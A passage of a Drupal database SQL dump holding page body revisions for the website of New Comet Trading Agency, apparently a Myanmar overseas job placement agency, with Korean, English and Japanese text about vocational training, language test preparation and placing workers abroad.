lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 155, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 155, 'ja', 0, '<p>Coming Soon....</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 155, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" 